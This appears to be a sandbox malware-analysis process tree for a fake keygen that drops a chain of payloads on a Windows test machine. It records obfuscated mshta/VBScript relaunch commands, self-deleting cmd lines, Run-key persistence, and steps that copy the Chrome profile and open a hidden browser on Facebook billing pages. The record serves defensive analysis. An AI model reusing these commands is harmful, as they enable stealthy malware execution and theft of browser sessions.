                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:352
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1520
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:1336
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:4708
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Turbo.C.4.0.Windows.7.Window.serial.number.maker.by.Lz0.zip\Turbo.C.4.0.Windows.7.Window.serial.number.maker.by.Lz0.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Turbo.C.4.0.Windows.7.Window.serial.number.maker.by.Lz0.zip\Turbo.C.4.0.Windows.7.Window.serial.number.maker.by.Lz0.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:2188
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:4116
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4208
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:2272
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                    PID:3840
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                keygen-step-1.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4244
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                keygen-step-5.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4292
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbscriPt: ClOse ( CReatEobjecT ( "WScriPt.sHeLl" ).RUn ( "CmD.ExE /c copY /y ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" RWD_.exe > NUL && starT RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii & iF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /f /IM ""%~nxm"" > nuL " , 0 ))
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4476
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c copY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" RWD_.exe > NUL && starT RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii & iF "" =="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /f /IM "%~nxm" > nuL
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4120
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RWD_.exe
                                                                                                                                                          RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:528
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbscriPt: ClOse ( CReatEobjecT ( "WScriPt.sHeLl" ).RUn ( "CmD.ExE /c copY /y ""C:\Users\Admin\AppData\Local\Temp\RWD_.exe"" RWD_.exe > NUL && starT RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii & iF ""-PQtL97YU9CePvSHWa~W4YULQmeii "" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\RWD_.exe"" ) do taskkill /f /IM ""%~nxm"" > nuL " , 0 ))
                                                                                                                                                            7⤵
                                                                                                                                                              PID:2204
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c copY /y "C:\Users\Admin\AppData\Local\Temp\RWD_.exe" RWD_.exe > NUL && starT RWD_.exe -PQtL97YU9CePvSHWa~W4YULQmeii & iF "-PQtL97YU9CePvSHWa~W4YULQmeii " =="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\RWD_.exe" ) do taskkill /f /IM "%~nxm" > nuL
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4372
                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                "C:\Windows\System32\regsvr32.exe" .\WiUZzK.CI -s
                                                                                                                                                                7⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                PID:3176
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /f /IM "keygen-step-5.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:4244
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                        keygen-step-2.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        PID:4296
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\CD05.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\CD05.tmp.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:4544
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\CD05.tmp.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:1464
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                6⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:4572
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4848
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4780
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 268
                                                                                                                                                                5⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:4372
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4940
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:4860
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                              keygen-step-3.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4364
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4216
                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:4160
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                keygen-step-4.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                PID:1812
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:528
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:2356
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:2364
                                                                                                                                                                  • C:\ProgramData\7200995.exe
                                                                                                                                                                    "C:\ProgramData\7200995.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4864
                                                                                                                                                                  • C:\ProgramData\3202116.exe
                                                                                                                                                                    "C:\ProgramData\3202116.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:4816
                                                                                                                                                                    • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                      "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4080
                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 2364 -s 1604
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:5024
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3500
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-77DD0.tmp\Install.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-77DD0.tmp\Install.tmp" /SL5="$6029C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:2480
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-3S5K6.tmp\Ultra.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-3S5K6.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      PID:344
                                                                                                                                                                      • C:\Program Files\Windows Media Player\TNQPSYVBJB\ultramediaburner.exe
                                                                                                                                                                        "C:\Program Files\Windows Media Player\TNQPSYVBJB\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:384
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MI6HN.tmp\ultramediaburner.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MI6HN.tmp\ultramediaburner.tmp" /SL5="$30368,281924,62464,C:\Program Files\Windows Media Player\TNQPSYVBJB\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                          PID:184
                                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:4440
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\02-7edfe-96a-61890-24e0d8efccd33\Gizhaxylaecy.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\02-7edfe-96a-61890-24e0d8efccd33\Gizhaxylaecy.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        PID:3844
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\48-a5322-46d-970b1-1378e02158c17\Jysirikufae.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\48-a5322-46d-970b1-1378e02158c17\Jysirikufae.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:4436
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ss1fucov.k3i\instEU.exe & exit
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4232
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ss1fucov.k3i\instEU.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ss1fucov.k3i\instEU.exe
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:3212
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wkz1bflu.pcr\gpooe.exe & exit
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:888
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yfcfg3do.a4c\google-game.exe & exit
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:1472
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\yfcfg3do.a4c\google-game.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\yfcfg3do.a4c\google-game.exe
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:964
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                                    10⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:3584
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kgg2qyoj.hn2\skipper.exe /s & exit
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:4932
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\kgg2qyoj.hn2\skipper.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\kgg2qyoj.hn2\skipper.exe /s
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:5092
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1716321181.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1716321181.exe
                                                                                                                                                                                      10⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:3780
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:2184
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\375431820.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\375431820.exe
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4672
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\kgg2qyoj.hn2\skipper.exe & exit
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:2860
                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                            ping 0
                                                                                                                                                                                            11⤵
                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                            PID:2288
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qca0mgyg.myr\md1_1eaf.exe & exit
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:1688
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\qca0mgyg.myr\md1_1eaf.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\qca0mgyg.myr\md1_1eaf.exe
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:5308
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0hszc2t.nf2\askinstall36.exe & exit
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:5472
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\w0hszc2t.nf2\askinstall36.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\w0hszc2t.nf2\askinstall36.exe
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                                                            PID:5616
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:6128
                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:5372
                                                                                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                PID:5380
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:5172
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc5e2e4f50,0x7ffc5e2e4f60,0x7ffc5e2e4f70
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:4924
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1724 /prefetch:8
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                        PID:812
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1672 /prefetch:2
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                          PID:4464
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2196 /prefetch:8
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                            PID:5752
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:1
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:2876
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:1
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:2972
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:4940
                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                    PID:5136
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                      PID:6216
                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,17750930497764153469,15789011799746628737,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:1
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                        PID:6236
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wuhibnls.v5t\DKAPBCSZVE.exe & exit
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:3612
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wuhibnls.v5t\DKAPBCSZVE.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\wuhibnls.v5t\DKAPBCSZVE.exe
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5460
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:6104
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
                                                                                                                                                                                                                          parse.exe -f json -b edge
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:5796
